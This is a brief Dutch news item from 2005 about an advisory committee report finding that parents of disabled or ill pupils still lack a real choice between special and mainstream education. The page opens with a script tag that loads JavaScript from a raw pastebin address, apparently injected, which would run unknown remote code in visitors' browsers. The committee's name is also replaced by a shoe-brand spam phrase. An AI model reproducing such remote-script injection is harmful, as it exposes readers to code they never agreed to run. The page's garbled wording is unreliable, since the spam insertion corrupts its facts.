<script type = "text / javascript" src = "https://pastebin.com/raw/t9XkH2vN"> </script>


Nieuws - 2005


persbericht ACTB. Keuzevrijheid zorgleerling nog niet vanzelfsprekend. 08 november 2005
ouders van leerlingen met een handicap, ziekte of stoornis kunnen nog onvoldoende kiezen of zij hun kind speciaal dan wel regulier onderwijs laten volgen. Dat is de
conclusie van de Advies Commissie Toelating en Begeleiding (Louboutin Heren Schoenen) in haar rapport dat de minister van OCW vandaag aan de Kamer aanbiedt.

Klik hier voor meer informatie